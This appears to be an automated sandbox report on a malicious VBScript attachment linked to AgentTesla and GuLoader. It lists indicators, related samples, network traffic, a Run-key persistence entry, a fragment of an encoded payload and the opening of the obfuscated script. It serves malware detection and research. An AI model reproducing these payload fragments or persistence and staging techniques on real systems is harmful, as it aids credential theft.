            https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.882848532717.000002165B480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882926973942.0000021669E6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878910754934.0000000005737000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878910754934.0000000005874000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://ip-api.comwab.exe, 0000000F.00000002.882856308898.0000000020C51000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlhpowershell.exe, 00000009.00000002.882848532717.000002165B32B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://drive.google.compowershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://drive.usercontent.google.compowershell.exe, 00000009.00000002.882848532717.000002165A2D1000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://github.com/Pester/PesterXzpowershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://drive.google.cpowershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://aka.ms/pscore68powershell.exe, 00000009.00000002.882848532717.0000021659E01000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://apis.google.compowershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://drive.google.com/uc?powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000009.00000002.882848532717.0000021659E01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878906475177.00000000046D1000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882856308898.0000000020C51000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://oneget.orgpowershell.exe, 00000009.00000002.882848532717.000002165B100000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://drive.googlepowershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://drive.google.copowershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            208.95.112.1
            ip-api.comUnited States
            53334TUT-ASUStrue
            172.217.2.33
            drive.usercontent.google.comUnited States
            15169GOOGLEUSfalse
            142.250.191.110
            drive.google.comUnited States
            15169GOOGLEUSfalse
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1466653
            Start date and time:2024-07-03 08:51:09 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 17m 39s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
            Run name:Suspected Instruction Hammering
            Number of analysed new started processes analysed:23
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:Inquiry Studbolt - 240703.vbe
            Detection:MAL
            Classification:mal100.troj.spyw.expl.evad.winVBE@14/8@3/3
            EGA Information:
            • Successful, ratio: 50%
            HCA Information:
            • Successful, ratio: 91%
            • Number of executed functions: 107
            • Number of non-executed functions: 29
            Cookbook Comments:
            • Found application associated with file extension: .vbe
            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
            • Exclude process from analysis (whitelisted): dllhost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): www.bing.com, assets.msn.com, ctldl.windowsupdate.com, api.msn.com
            • Execution Graph export aborted for target powershell.exe, PID 2680 because it is empty
            • Execution Graph export aborted for target powershell.exe, PID 6840 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtReadVirtualMemory calls found.
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            TimeTypeDescription
            07:55:12AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run GrOcCQC C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe
            07:55:20AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run GrOcCQC C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            208.95.112.12024.scr.exeGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            Purchase Order N#U00b0 20240702.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
            • ip-api.com/line/?fields=hosting
            AWB 3609 961.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            Doc_CI_PL_HBL_COO_Insu_.exeGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            roger.exeGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            okmnji.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
            • ip-api.com/line/?fields=hosting
            AWB DHL#40882993049403.pdf.exeGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            llD1w4ROY5.exeGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • ip-api.com/line/?fields=hosting
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            ip-api.com2024.scr.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            Purchase Order N#U00b0 20240702.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
            • 208.95.112.1
            AWB 3609 961.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            Doc_CI_PL_HBL_COO_Insu_.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            roger.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            okmnji.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
            • 208.95.112.1
            AWB DHL#40882993049403.pdf.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            llD1w4ROY5.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 208.95.112.1
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            TUT-ASUS2024.scr.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            Purchase Order N#U00b0 20240702.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
            • 208.95.112.1
            AWB 3609 961.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            Doc_CI_PL_HBL_COO_Insu_.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            roger.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            okmnji.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
            • 208.95.112.1
            AWB DHL#40882993049403.pdf.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            llD1w4ROY5.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 208.95.112.1
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            3b5074b1b5d032e5620f69f9f700ff0e2024.scr.exeGet hashmaliciousAgentTeslaBrowse
            • 142.250.191.110
            • 172.217.2.33
            Enquiry Quote - 24071834-01.vbsGet hashmaliciousGuLoaderBrowse
            • 142.250.191.110
            • 172.217.2.33
            DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
            • 142.250.191.110
            • 172.217.2.33
            2669976595_366408723_KHI_SOF_240702_0957_P.vbsGet hashmaliciousGuLoaderBrowse
            • 142.250.191.110
            • 172.217.2.33
            DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbsGet hashmaliciousGuLoaderBrowse
            • 142.250.191.110
            • 172.217.2.33
            AF85714759_htm#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
            • 142.250.191.110
            • 172.217.2.33
            Zapytanie ofertowe (GASTRON 07022024).vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
            • 142.250.191.110
            • 172.217.2.33
            B24E33 ENQUIRY.vbeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 142.250.191.110
            • 172.217.2.33
            Purchase Order N#U00b0 20240702.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
            • 142.250.191.110
            • 172.217.2.33
            AWB 3609 961.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
            • 142.250.191.110
            • 172.217.2.33
            37f463bf4616ecd445d4a1937da06e19RFQ KTH02-07-2024#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
            • 142.250.191.110
            • 172.217.2.33
            AF85714759_htm#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
            • 142.250.191.110
            • 172.217.2.33
            Zapytanie ofertowe (GASTRON 07022024).vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
            • 142.250.191.110
            • 172.217.2.33
            Purchase Order N#U00b0 20240702.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
            • 142.250.191.110
            • 172.217.2.33
            birectangular.vbsGet hashmaliciousFormBook, GuLoaderBrowse
            • 142.250.191.110
            • 172.217.2.33
            SecuriteInfo.com.Adware.DownwareNET.4.16171.10714.exeGet hashmaliciousUnknownBrowse
            • 142.250.191.110
            • 172.217.2.33
            SecuriteInfo.com.Adware.DownwareNET.4.16171.10714.exeGet hashmaliciousUnknownBrowse
            • 142.250.191.110
            • 172.217.2.33
            file.exeGet hashmaliciousVidarBrowse
            • 142.250.191.110
            • 172.217.2.33
            FmQx1Fw3VA.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
            • 142.250.191.110
            • 172.217.2.33
            config.lnk.mal.lnkGet hashmaliciousCredGrabber, Meduza StealerBrowse
            • 142.250.191.110
            • 172.217.2.33
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeZapytanie ofertowe (GASTRON 07022024).vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
              Purchase Order N#U00b0 20240702.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                New Order CHAL-0435.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                  FA46969-OVERSEAS 2024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                    staff record or employee record.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                      Inquiry-N#U00b0 3079-24-06.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                        Inquiry-N#U00b0 3079-24-06.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                          Salary List.xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                            temp2.vbsGet hashmaliciousGuLoaderBrowse
                              temp2.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:modified
                                Size (bytes):11608
                                Entropy (8bit):4.8908305915084105
                                Encrypted:false
                                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1940658735648508
                                Encrypted:false
                                SSDEEP:3:NlllulImPltZ:NllUL
                                MD5:8AE1FFF147E23D63DB05800F7EBCE477
                                SHA1:2CE64031721E4B38D38CAC2568D964708673A1A5
                                SHA-256:8F50D85B9696F09A95A0AEACEC2B2596499D618D964FC7569A511A9B15496979
                                SHA-512:6924FD35F93B70D0D2664D188266AFAA9DB6044E8F74EFEDCA2CB996F616182BBEC43023A6B6E8FE5A358C83DD9F453BA6F99ED387F45F4E736728F6FAB844BC
                                Malicious:false
                                Preview:@...e................................................@..........
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:dropped
                                Size (bytes):428132
                                Entropy (8bit):5.940357935765949
                                Encrypted:false
                                SSDEEP:6144:c5hqyFqYdoggcbiS6cCvGuUG4Tz2kV8v7S54zihTKrRlLt36eV374QJG:c5Fhmgbo4WkV8e58icrHt36eV374P
                                MD5:E51B9946D8F4C3242757F29CE68CF7B2
                                SHA1:15180921F60560CB3C28B4194EB13A8AA898F681
                                SHA-256:C4A205B291209029FB3FBBF0DE0C41FEB9E0C996F268FC30023E207597A9A415
                                SHA-512:99FA37EF5C76F2FC5B914C6F0913B6296CE5ACD201CECFF80DEB5E6DF9682C25B9BFA5447A8DADCAC3138595CD72D770E3C42131AD92B19E53C774CE8FDA55FF
                                Malicious:false
                                Preview:cQGb6wLIibtj/BsAcQGbcQGbA1wkBOsCPC/rAoAjuZD/20RxAZtxAZuBweqs46rrAvJxcQGbgcGGU0AQ6wLoBesCyd1xAZvrAh8TuhxuEflxAZvrAoXH6wLGSOsCEHUxynEBm+sCMziJFAtxAZvrAq3c0eJxAZtxAZuDwQRxAZvrAueLgfldxpwAfMtxAZvrAgw/i0QkBHEBm+sCwq2Jw3EBm+sC+/CBwz4jcQDrAuBY6wLtKrqwhVQCcQGbcQGbgfJpgFg5cQGbcQGbgfLZBQw7cQGb6wKvd+sCPs1xAZvrAj/x6wJUHIsMEOsCHM3rAn1oiQwTcQGbcQGbQnEBm+sC96iB+iB+BAB11OsCBJDrAs9WiVwkDHEBm3EBm4HtAAMAAHEBm+sCRsqLVCQIcQGb6wJsc4t8JARxAZvrAt6DievrAtOx6wK48oHDnAAAAOsCtQFxAZtT6wISfOsCIcdqQOsCBtDrAqcTievrAnov6wKQ5seDAAEAAADQuwBxAZtxAZuBwwABAADrAlhKcQGbU3EBm+sCkBKJ63EBm3EBm4m7BAEAAHEBm+sCDbiBwwQBAADrAhjkcQGbU3EBm3EBm2r/6wJoZ3EBm4PCBXEBm3EBmzH2cQGbcQGbMcnrAoki6wIuFYsacQGbcQGbQesCO1LrAmW8ORwKdfLrAgj8cQGbRnEBm3EBm4B8Cvu4dd1xAZtxAZuLRAr86wI6eusCFbYp8OsCuiXrAkNs/9JxAZvrAm44uiB+BADrArKycQGbMcDrAqsq6wImHot8JAzrAu8icQGbgTQHArNcbXEBm3EBm4PABHEBm+sClsU50HXl6wJjjOsCNPSJ+3EBm3EBm//X6wJf6XEBm4tW1Ti5CZxp2hLdrx+8BguDQQ2qtcfdh45i2RErZ9c4uUWbmFc6udSY8vk9g0JWVoTU3YRp0tVEg1pRdJi+2KTF91FtNgqRDYPHUW1lH0fjg/dRbaYQzVGD91FtC/TEuYsG
                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:modified
                                Size (bytes):516608
                                Entropy (8bit):6.035530871194082
                                Encrypted:false
                                SSDEEP:12288:TTx5KRZ18xtSP+szdcIugOO50MMEMOkP:QmxtSP+sJ+O5FWPP
                                MD5:251E51E2FEDCE8BB82763D39D631EF89
                                SHA1:677A3566789D4DA5459A1ECD01A297C261A133A2
                                SHA-256:2682086ACE1970D5573F971669591B731F87D749406927BD7A7A4B58C3C662E9
                                SHA-512:3B49E6D9197B12CA7AA282707D62496D9FEAC32B3F6FD15AFFD4EAAA5239DA903FADD4600A1D17A45EC330A590FC86218C9A7DC20306B52D8170E04B0E325521
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Joe Sandbox View:
                                • Filename: Zapytanie ofertowe (GASTRON 07022024).vbs, Detection: malicious, Browse
                                • Filename: Purchase Order N#U00b0 20240702.vbs, Detection: malicious, Browse
                                • Filename: New Order CHAL-0435.vbs, Detection: malicious, Browse
                                • Filename: FA46969-OVERSEAS 2024.vbs, Detection: malicious, Browse
                                • Filename: staff record or employee record.vbs, Detection: malicious, Browse
                                • Filename: Inquiry-N#U00b0 3079-24-06.exe, Detection: malicious, Browse
                                • Filename: Inquiry-N#U00b0 3079-24-06.exe, Detection: malicious, Browse
                                • Filename: Salary List.xls.vbs, Detection: malicious, Browse
                                • Filename: temp2.vbs, Detection: malicious, Browse
                                • Filename: temp2.vbs, Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                File type:ASCII text, with CRLF line terminators
                                Entropy (8bit):4.880905742953184
                                TrID:
                                • Visual Basic Script (13500/0) 100.00%
                                File name:Inquiry Studbolt - 240703.vbe
                                File size:18'970 bytes
                                MD5:cac00b561578ffb0e2b2b2fd96eec0cd
                                SHA1:16ffdf688abd43ccfaa46f24709ade48af5534e7
                                SHA256:8876ad4754fb4f61ba5489924603d279dc023f68c1ba847020107a376de9a9ad
                                SHA512:7bad80c9c51cb4a71b665e3dd39d18cc74f0a049fdd2d99a47f91db66cca90988338d1c5fd6f47572f46944a0974922258f62dac3a3bf13cb68c962749a4b9e0
                                SSDEEP:384:FEqYZwQPrTnemkhGKab3oF6NdV9Ndnr3sVP9+nuBwSv:FEqDAnemkIbM6bV9fr3sVFouBwSv
                                TLSH:7D8227ADDDFA79AC468EB6658901988C742409DDFD35B43A35C9428F0001FCB7B688FB
                                File Content Preview:..................Set Verfendes = CreateObject("WScript.Shell")..nyvurderingerne = -9780..Unauthorized = "Bhutansk. verdensmesterens."..Protesttog = &H5DBC..Superinjustice = &HFFFF3B7F..Disconcertedly28 = "Prakker; provocation;"..Omfangs = &H5521..Urease1
                                Icon Hash:68d69b8f86ab9a86
                                TimestampSource PortDest PortSource IPDest IP
                                Jul 3, 2024 08:54:41.349242926 CEST49949443192.168.11.30142.250.191.110
                                Jul 3, 2024 08:54:41.349268913 CEST44349949142.250.191.110192.168.11.30
                                Jul 3, 2024 08:54:41.349556923 CEST49949443192.168.11.30142.250.191.110
                                Jul 3, 2024 08:54:41.356527090 CEST49949443192.168.11.30142.250.191.110
                                Jul 3, 2024 08:54:41.356540918 CEST44349949142.250.191.110192.168.11.30
                                Jul 3, 2024 08:54:41.611905098 CEST44349949142.250.191.110192.168.11.30
                                Jul 3, 2024 08:54:41.612266064 CEST49949443192.168.11.30142.250.191.110
                                Jul 3, 2024 08:54:41.612679958 CEST44349949142.250.191.110192.168.11.30
                                Jul 3, 2024 08:54:41.612941027 CEST49949443192.168.11.30142.250.191.110
                                Jul 3, 2024 08:54:41.614413023 CEST49949443192.168.11.30142.250.191.110
                                Jul 3, 2024 08:54:41.614418983 CEST44349949142.250.191.110192.168.11.30
                                Jul 3, 2024 08:54:41.614681005 CEST44349949142.250.191.110192.168.11.30
                                Jul 3, 2024 08:54:41.621141911 CEST49949443192.168.11.30142.250.191.110
                                Jul 3, 2024 08:54:41.668215990 CEST44349949142.250.191.110192.168.11.30
                                Jul 3, 2024 08:54:41.879374027 CEST44349949142.250.191.110192.168.11.30
                                Jul 3, 2024 08:54:41.879471064 CEST44349949142.250.191.110192.168.11.30
                                Jul 3, 2024 08:54:41.879653931 CEST49949443192.168.11.30142.250.191.110
                                Jul 3, 2024 08:54:41.885519028 CEST49949443192.168.11.30142.250.191.110
                                Jul 3, 2024 08:54:42.011673927 CEST49950443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:54:42.011698961 CEST44349950172.217.2.33192.168.11.30
                                Jul 3, 2024 08:54:42.011923075 CEST49950443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:54:42.012289047 CEST49950443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:54:42.012300014 CEST44349950172.217.2.33192.168.11.30
                                Jul 3, 2024 08:54:42.266915083 CEST44349950172.217.2.33192.168.11.30
                                Jul 3, 2024 08:54:42.267143965 CEST49950443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:54:42.268579960 CEST49950443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:54:42.268588066 CEST44349950172.217.2.33192.168.11.30
                                Jul 3, 2024 08:54:42.268842936 CEST44349950172.217.2.33192.168.11.30
                                Jul 3, 2024 08:54:42.269679070 CEST49950443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:54:42.312196970 CEST44349950172.217.2.33192.168.11.30
                                Jul 3, 2024 08:54:43.298443079 CEST44349950172.217.2.33192.168.11.30
                                Jul 3, 2024 08:54:43.299590111 CEST49950443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:54:43.299746037 CEST49950443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:54:43.314500093 CEST44349950172.217.2.33192.168.11.30
                                Jul 3, 2024 08:54:43.314682007 CEST49950443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:54:43.314770937 CEST49950443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:54:43.324139118 CEST44349950172.217.2.33192.168.11.30
                                Jul 3, 2024 08:54:43.325045109 CEST49950443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:54:43.330918074 CEST44349950172.217.2.33192.168.11.30
                                Jul 3, 2024 08:54:43.379525900 CEST49950443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:54:43.379750967 CEST44349950172.217.2.33192.168.11.30
                                Jul 3, 2024 08:54:43.416575909 CEST44349950172.217.2.33192.168.11.30
                                Jul 3, 2024 08:54:43.417794943 CEST49950443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:54:43.417824030 CEST44349950172.217.2.33192.168.11.30
                                Jul 3, 2024 08:54:43.421092987 CEST44349950172.217.2.33192.168.11.30
                                Jul 3, 2024 08:54:43.422468901 CEST49950443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:54:43.422480106 CEST44349950172.217.2.33192.168.11.30
                                Jul 3, 2024 08:54:43.429030895 CEST44349950172.217.2.33192.168.11.30
                                Jul 3, 2024 08:54:43.429965019 CEST49950443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:54:43.430305958 CEST44349950172.217.2.33192.168.11.30
                                Jul 3, 2024 08:54:43.437268019 CEST44349950172.217.2.33192.168.11.30
